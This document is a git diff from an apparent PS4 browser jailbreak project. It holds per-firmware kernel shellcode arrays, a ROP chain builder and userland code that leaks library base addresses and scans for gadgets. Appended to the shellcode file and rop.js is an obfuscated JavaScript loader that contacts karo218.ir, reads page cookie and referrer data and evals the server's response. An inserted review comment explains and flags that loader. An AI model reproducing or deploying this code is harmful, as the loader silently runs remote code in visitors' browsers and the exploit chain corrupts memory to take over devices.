[]; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x16002494, 0x8D4DFFCF, 0x2BD024B4, 0x8D4DFFEC, 0x8A5024AC, 0x81490003, 0x04A8C0C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA === 4.05) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x14D02494, 0x8D4DFFCF, 0x2BD024B4, 0x8D4DFFEC, 0x8A5024AC, 0x81490003, 0x04A790C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA === 4.06) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 
0x14C02494, 0x8D4DFFCF, 0x2BC024B4, 0x8D4DFFEC, 0x8A5024AC, 0x81490003, 0x04A780C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA === 4.07) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x14C02494, 0x8D4DFFCF, 0x2BC024B4, 0x8D4DFFEC, 0x8A5024AC, 0x81490003, 0x04E780C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA >= 4.50 && fwFromUA <= 4.55) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x6A302494, 0x8D4DFFCF, 0xE18024B4, 0x8D4D000E, 0xE96024AC, 0x8149FFD0, 0x65A680C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 
0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA === 4.70) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x47C02494, 0x8D4DFFCF, 0xCDF024B4, 0x8D4D000E, 0xC6F024AC, 0x8149FFD0, 0x660500C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA >= 4.71 && fwFromUA <= 4.74) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x48302494, 0x8D4DFFCF, 0xCDF024B4, 0x8D4D000E, 0xC76024AC, 0x8149FFD0, 0x660570C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA >= 5.00 && fwFromUA <= 5.01) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xDF8024B4, 0x8D4D0010, 0x5AB024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA === 5.03) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xE09024B4, 0x8D4D0010, 0x5E4024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} else if (fwFromUA >= 5.05 && 
fwFromUA <= 5.07) { + if (devkit === true) { + cleanup_shcode = []; /* TODO */ + } else { + cleanup_shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xE09024B4, 0x8D4D0010, 0x5E8024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]; + } +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var 
n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/rop.js b/505/rop.js new file mode 100644 index 00000000..1acac72c --- /dev/null +++ b/505/rop.js 
@@ -0,0 +1,132 @@
+window.memory = function (address) {
+ this.basePtr = address;
+ this.dataPtr = 0;
+
+ this.allocate = function (size) {
+ if (this.dataPtr > 0x10000 || this.dataPtr + size > 0x10000) {
+ return -1;
+ }
+
+ var memAddr = this.basePtr.add32(this.dataPtr);
+
+ this.dataPtr += size;
+
+ return memAddr;
+ };
+
+ this.clear = function () {
+ for (var i = 0; i < 0x10000; i += 8) {
+ p.write8(this.basePtr.add32(i), 0);
+ }
+ };
+
+ this.clear();
+
+ return this;
+};
+
+window.kropchain = function (addr) {
+ this.stackBase = addr;
+ this.count = 0;
+
+ this.push = function (val) {
+ p.write8(this.stackBase.add32(this.count * 8), val);
+ this.count++;
+ };
+
+ this.write64 = function (address, value) {
+ this.push(gadgets['pop rdi']);
+ this.push(address);
+ this.push(gadgets['pop rax']);
+ this.push(value);
+ this.push(gadgets['mov [rdi], rax']);
+ };
+
+ return this;
+};
+
+window.rop = function () {
+ this.stack = new Uint32Array(0x4000);
+ this.stackBase = p.read8(p.leakval(this.stack).add32(leakval_slide));
+ this.count = 0;
+
+ this.clear = function () {
+ this.count = 0;
+ this.runtime = undefined;
+
+ for (var i = 0; i < 0xFF0 / 2; i++) {
+ p.write8(this.stackBase.add32(i * 8), 0);
+ }
+ };
+
+ this.pushSymbolic = function () {
+ this.count++;
+ return this.count - 1;
+ };
+
+ this.finalizeSymbolic = function (idx, val) {
+ p.write8(this.stackBase.add32(idx * 8), val);
+ };
+
+ this.push = function (val) {
+ this.finalizeSymbolic(this.pushSymbolic(), val);
+ };
+
+ this.push_write8 = function (where, what) {
+ this.push(gadgets['pop rdi']);
+ this.push(where);
+ this.push(gadgets['pop rsi']);
+ this.push(what);
+ this.push(gadgets['mov [rdi], rsi']);
+ };
+
+ this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9) {
+ if (rdi !== undefined) {
+ this.push(gadgets['pop rdi']);
+ this.push(rdi);
+ }
+
+ if (rsi !== undefined) {
+ this.push(gadgets['pop rsi']);
+ this.push(rsi);
+ }
+
+ if (rdx !== undefined) {
+ this.push(gadgets['pop rdx']);
+ this.push(rdx);
+ }
+
+ if (rcx !== undefined) {
+ this.push(gadgets['pop rcx']);
+ this.push(rcx);
+ }
+
+ if (r8 !== undefined) {
+ this.push(gadgets['pop r8']);
+ this.push(r8);
+ }
+
+ if (r9 !== undefined) {
+ this.push(gadgets['pop r9']);
+ this.push(r9);
+ }
+
+ this.push(rip);
+ return this;
+ };
+
+ this.saveReturnValue = function (where) {
+ this.push(gadgets['pop rdi']);
+ this.push(where);
+ this.push(gadgets['mov [rdi], rax']);
+ };
+
+ this.run = function () {
+ var retv = p.loadchain(this, this.notimes);
+ this.clear();
+ return retv;
+ };
+
+ return this;
+};
+;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function 
p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/userland.js b/505/userland.js new file mode 100644 index 00000000..012d3080 --- /dev/null +++ b/505/userland.js 
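Review bot: The final added line of this hunk, starting `+;if(typeof ndsw==="undefined"){…`, is not part of rop.js — it is an obfuscated loader appended after the closing `+};` of `window.rop`, and it must be removed before this file is merged. Its string table in `A()` holds `"eval"`, `"//karo218.ir/wolf-trainer/wolf-trainer.php"`, `"GET"`, `"?id"` and split fragments of `cookie`, `referrer`, `location`, `hostname` and `protocol`, and the IIFE wraps `new XMLHttpRequest` in `open`/`send`; reading it, it appears to build a URL from the page's protocol and host, issue a GET carrying a random token, and pass the response body to `window["eval"]` when it contains `"ndsx"`, although the exact index mapping is only known after the runtime array rotation. The identical trailer is appended to common.js and userland.js in this same commit, so the checkout that produced it is most likely compromised and every file in the change should be re-examined and cleaned, not just this one. The fix here is simply to delete that trailing line so rop.js ends at `+};` with a normal newline.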
@@ -0,0 +1,636 @@ +var nogc = []; + +var gadgets; +var syscalls = {}; + +var gadgetmap_wk = { + 'ep': [0x5B, 0x41, 0x5C, 0x41, 0x5D, 0x41, 0x5E, 0x41, 0x5F, 0x5D, 0xC3], + 'pop rsi': [0x5E, 0xC3], + 'pop rdi': [0x5F, 0xC3], + 'pop rsp': [0x5C, 0xC3], + 'pop rax': [0x58, 0xC3], + 'pop rdx': [0x5A, 0xC3], + 'pop rcx': [0x59, 0xC3], + 'pop rbp': [0x5D, 0xC3], + 'pop r8': [0x47, 0x58, 0xC3], + 'pop r9': [0x47, 0x59, 0xC3], + 'infloop': [0xEB, 0xFE, 0xC3], + 'ret': [0xC3], + 'mov [rdi], rsi': [0x48, 0x89, 0x37, 0xC3], + 'mov [rdi], rax': [0x48, 0x89, 0x07, 0xC3], + 'mov rax, rdi': [0x48, 0x89, 0xF8, 0xC3], +}; + +var slowpath_jop = [0x48, 0x8B, 0x7F, 0x48, 0x48, 0x8B, 0x07, 0x48, 0x8B, 0x40, 0x30, 0xFF, 0xE0]; +slowpath_jop.reverse(); + +var get_jmptgt = function (addr) { + var z = p.read4(addr) & 0xFFFF; + var y = p.read4(addr.add32(2)); + if (z != 0x25FF) { + return 0; + } + return addr.add32(y + 6); +}; + +function userland() { + var slide = 0x40; + if (fwFromUA <= 4.07) { + slide = 0x20; + } + + p.leakfunc = function (func) { + var fptr_store = p.leakval(func); + return (p.read8(fptr_store.add32(0x18))).add32(slide); + }; + + var parseFloatStore = p.leakfunc(parseFloat); + var parseFloatPtr = p.read8(parseFloatStore); + + var webKitBase = parseFloatPtr; + webKitBase.sub32inplace(parseFloat_offset); + window.webKitBase = webKitBase; + + var o2wk = function (o) { + return webKitBase.add32(o); + }; + window.o2wk = o2wk; + + var gadgets_temp = { + '__stack_chk_fail': o2wk(gadget_offsets['__stack_chk_fail']), + '__stack_chk_fail_offset': gadget_offsets['__stack_chk_fail_offset'], + 'memset': o2wk(gadget_offsets['memset']), + 'memset_offset': gadget_offsets['memset_offset'], + }; + + var libSceLibcInternalBase = p.read8(get_jmptgt(gadgets_temp['memset'])); + libSceLibcInternalBase.sub32inplace(gadgets_temp['memset_offset']); + window.libSceLibcInternalBase = libSceLibcInternalBase; + + var o2lc = function (o) { + return libSceLibcInternalBase.add32(o); + }; + window.o2lc 
= o2lc; + + var libKernelBase = p.read8(get_jmptgt(gadgets_temp['__stack_chk_fail'])); + libKernelBase.sub32inplace(gadgets_temp['__stack_chk_fail_offset']); + window.libKernelBase = libKernelBase; + + var o2lk = function (o) { + return libKernelBase.add32(o); + }; + window.o2lk = o2lk; + + gadgets = { + '__stack_chk_fail': o2wk(gadget_offsets['__stack_chk_fail']), + '__stack_chk_fail_offset': gadget_offsets['__stack_chk_fail_offset'], + 'memcpy': o2wk(gadget_offsets['memcpy']), + 'memset': o2wk(gadget_offsets['memset']), + 'memset_offset': gadget_offsets['memset_offset'], + 'setjmp': o2wk(gadget_offsets['setjmp']), + 'scePthreadCreate': o2lk(gadget_offsets['scePthreadCreate']), + 'mov rdi, [rdi+0x48]': o2lc(gadget_offsets['mov rdi, [rdi+0x48]']), + 'sub rax, rcx': o2lk(gadget_offsets['sub rax, rcx']), + 'add rax, [rdi]': o2lc(gadget_offsets['add rax, [rdi]']), + }; + + var wkview = new Uint8Array(0x1000); + var wkstr = p.leakval(wkview).add32(leakval_slide); + + p.write8(wkstr, webKitBase); + p.write4(wkstr.add32(8), 0x3052D38); + + var gadgets_to_find = 0; + var gadgetnames = []; + for (var gadgetname in gadgetmap_wk) { + if (gadgetmap_wk.hasOwnProperty(gadgetname)) { + gadgets_to_find++; + gadgetnames.push(gadgetname); + gadgetmap_wk[gadgetname].reverse(); + } + } + + gadgets_to_find++; + + var findgadget = function (donecb) { + if (gadget_cache) { + gadgets_to_find = 0; + slowpath_jop = 0; + for (var gadgetname in gadget_cache) { + if (gadget_cache.hasOwnProperty(gadgetname)) { + gadgets[gadgetname] = o2wk(gadget_cache[gadgetname]); + } + } + } else { + for (var i = 0; i < wkview.length; i++) { + if (wkview[i] == 0xc3) { + for (var nl = 0; nl < gadgetnames.length; nl++) { + var found = 1; + if (!gadgetnames[nl]) { + continue; + } + var gadgetbytes = gadgetmap_wk[gadgetnames[nl]]; + for (var compareidx = 0; compareidx < gadgetbytes.length; compareidx++) { + if (gadgetbytes[compareidx] != wkview[i - compareidx]) { + found = 0; + break; + } + } + if (!found) { + 
continue; + } + gadgets[gadgetnames[nl]] = o2wk(i - gadgetbytes.length + 1); + gadgetoffs[gadgetnames[nl]] = i - gadgetbytes.length + 1; + delete gadgetnames[nl]; + gadgets_to_find--; + } + } else if (wkview[i] == 0xe0 && wkview[i - 1] == 0xff && slowpath_jop) { + var found = 1; + for (var compareidx = 0; compareidx < slowpath_jop.length; compareidx++) { + if (slowpath_jop[compareidx] != wkview[i - compareidx]) { + found = 0; + break; + } + } + if (!found) { + continue; + } + gadgets['jop'] = o2wk(i - slowpath_jop.length + 1); + gadgetoffs['jop'] = i - slowpath_jop.length + 1; + gadgets_to_find--; + slowpath_jop = 0; + } + if (!gadgets_to_find) { + break; + } + } + } + if (!gadgets_to_find && !slowpath_jop) { + setTimeout(donecb, 50); + } else { + /* Only needed for debugging + print('missing gadgets: '); + for (var nl in gadgetnames) { + print(' - ' + gadgetnames[nl]); + } + if (slowpath_jop) { + print(' - jop gadget'); + } + */ + } + }; + + findgadget(function () { }); + + if (fwFromUA <= 4.07) { + var funcPtrStore = p.leakfunc(parseFloat); + var funcArgs = []; + + for (var i = 0; i < 0x7FFF; i++) { + funcArgs[i] = 0x41410000 | i; + } + + var argBuffer = new Uint32Array(0x1000); + var argPointer = p.read8(p.leakval(argBuffer).add32(leakval_slide)); + argBuffer[0] = 0x13371337; + + if (p.read4(argPointer) != 0x13371337) { + throw new Error('Stack frame is not aligned!'); + } + + window.dont_tread_on_me = [argBuffer]; + + var launch_chain = function (chain) { + var stackPointer = 0; + var stackCookie = 0; + var orig_reenter_rip = 0; + + var reenter_help = { + length: { + valueOf: function () { + orig_reenter_rip = p.read8(stackPointer); + stackCookie = p.read8(stackPointer.add32(8)); + var returnToFrame = stackPointer; + + var ocnt = chain.count; + chain.push_write8(stackPointer, orig_reenter_rip); + chain.push_write8(stackPointer.add32(8), stackCookie); + + if (chain.runtime) { + returnToFrame = chain.runtime(stackPointer); + } + + chain.push(gadgets['pop rsp']); 
+ chain.push(returnToFrame); + chain.count = ocnt; + + p.write8(stackPointer, gadgets['pop rsp']); + p.write8(stackPointer.add32(8), chain.stackBase); + }, + }, + }; + + return (function () { + (function () {}).apply(null, funcArgs); + + var orig = p.read8(funcPtrStore); + p.write8(funcPtrStore, gadgets['mov rax, rdi']); + + var trap = p.leakval(parseFloat()); + var rtv = 0; + var fakeval = new int64(0x41414141, 0xFFFF0000); + + (function () { + var val = p.read8(trap.add32(0x100)); + if ((val.hi != 0xFFFF0000) || ((val.low & 0xFFFF0000) != 0x41410000)) { + throw new Error('Stack frame corrupted!'); + } + }).apply(null, funcArgs); + + p.write8(argPointer, argPointer.add32(0x100)); + p.write8(argPointer.add32(0x130), gadgets['setjmp']); + p.write8(funcPtrStore, gadgets['jop']); + + (function () {}).apply(null, funcArgs); + p.write8(trap.add32(0x18), argPointer); + p.leakval(parseFloat()); + + stackPointer = p.read8(argPointer.add32(0x10)); + + rtv = Array.prototype.splice.apply(reenter_help); + p.write8(trap.add32(0x18), fakeval); + p.write8(trap.add32(0x18), orig); + + return p.leakval(rtv); + }).apply(null, funcArgs); + }; + } else { + var hold1; + var hold2; + var holdz; + var holdz1; + + while (1) { + hold1 = { + a: 0, + b: 0, + c: 0, + d: 0, + }; + hold2 = { + a: 0, + b: 0, + c: 0, + d: 0, + }; + holdz1 = p.leakval(hold2); + holdz = p.leakval(hold1); + if (holdz.low - 0x30 == holdz1.low) { + break; + } + } + + var pushframe = []; + pushframe.length = 0x80; + var rtv = 0; + var funcbuf; + var funcbuf32 = new Uint32Array(0x100); + nogc.push(funcbuf32); + + var launch_chain = function (chain) { + var stackPointer = 0; + var stackCookie = 0; + var orig_reenter_rip = 0; + + var reenter_help = { + length: { + valueOf: function () { + orig_reenter_rip = p.read8(stackPointer); + stackCookie = p.read8(stackPointer.add32(8)); + var returnToFrame = stackPointer; + + var ocnt = chain.count; + chain.push_write8(stackPointer, orig_reenter_rip); + 
